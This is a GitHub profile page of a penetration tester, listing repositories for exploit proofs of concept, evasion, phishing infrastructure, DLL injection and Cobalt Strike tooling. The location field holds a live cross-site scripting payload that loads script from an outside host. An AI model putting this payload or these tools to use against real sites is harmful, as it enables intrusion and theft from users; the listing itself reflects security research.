ZephrFish
Hacker, Builder, Leader, Thinker, FAFO Engineer
"><script src="https://xss.r1.pe"></script>Scotland
Pinned Repositories
AttackDeploy
Scripts for Deploying new server
Bloodhound-CustomQueries
Custom Queries - Brought Up to BH4.1 syntax
BugBountyTemplates
A collection of templates for bug bounty reporting
BurpFeed
Hacked together script for feeding urls into Burp's Sitemap
CVE-2020-1350_HoneyPoC
HoneyPoC: Proof-of-Concept (PoC) script to exploit SIGRed (CVE-2020-1350). Achieves Domain Admin on Domain Controllers running Windows Server 2000 up to Windows Server 2019.
DockerAttack
Various Tools and Docker Images
GoogD0rker
Note: Going through a full re-write of the tooling so the current versions in the repo do not work!
RandomScripts
Random Shell Scripts and other ideas I have along the way
static-tools
Static compiled binaries + scripts ready to use on systems
Wordlists
Various Payload wordlists
ZephrFish's Repositories
ZephrFish/WindowsHardeningScript
Some settings stolen from multiple scripts @ZephrFish
ZephrFish/RandomScripts
Random Shell Scripts and other ideas I have along the way
ZephrFish/AutoHoneyPoC
AutoPoC Generator HoneyPoC
ZephrFish/DynamicMSBuilder
A Dynamic MSBuild task to help with minor obfuscation of C# Binaries to evade static signatures on each compilation
ZephrFish/ADFSDump-PS
PowerShell Implementation of ADFSDump to assist with GoldenSAML
ZephrFish/ChunkyIngress
Leverages B64 chunks to split files and save to clipboard
ZephrFish/CVE-2023-34362
CVE-2023-34362: MOVEit Transfer Unauthenticated RCE
ZephrFish/SandboxSpy
Code for profiling sandboxes - Initially an idea to profile sandboxes, the code is written to take enviromental variables and send them back in a Base32 string over HTTP to an endpoint.
ZephrFish/HelloJackHunter
Research into WinSxS binaries and finding hijackable paths
ZephrFish/PotUtils
ZephrFish/NotProxyShellScanner
Python implementation for NotProxyShell aka CVE-2022-40140 & CVE-2022-41082
ZephrFish/ZephrFish
ZephrFish/CVE-2024-4577-PHP-RCE
PHP RCE PoC for CVE-2024-4577 written in bash, go, python and a nuclei template
ZephrFish/WebSocketsAreFun
FAFO with WebSockets
ZephrFish/zephrfish.github.io
zsec backup blog
ZephrFish/CVE-2024-3400-Canary
Have we not learnt from HoneyPoC?
ZephrFish/BadShares
A tool to create randomly insecure file shares that also contain unsecured credential files
ZephrFish/DLL-Exports-Reverse-Proxy-Gen
A simple python tool to generate a a header file of correctly formatted DLL export function forwards for all functions exported by the target DLL.
ZephrFish/OffensiveCpp
This repo contains C/C++ snippets that can be handy in specific offensive scenarios.
ZephrFish/TrAMSI
ZephrFish/zephrsnaps.github.io
ZephrFish/allthewayback
Search the Wayback Machine for specific historical files which may contain sensitive data.
ZephrFish/Burp2API
Converting your Burp Suite projects into JSON APIs
ZephrFish/C-from-Scratch
A roadmap to learn C from Scratch
ZephrFish/Evilginx-Phishing-Infra-Setup
Evilginx Phishing Engagement Infrastructure Setup Guide
ZephrFish/GOAD
game of active directory but on Windows
ZephrFish/HelpColor
Agressor script that lists available Cobalt Strike beacon commands and colors them based on their type
ZephrFish/IconJector
Unorthodox and stealthy way to inject a DLL into the explorer using icons
ZephrFish/Spartacus
Spartacus DLL/COM Hijacking Toolkit
ZephrFish/test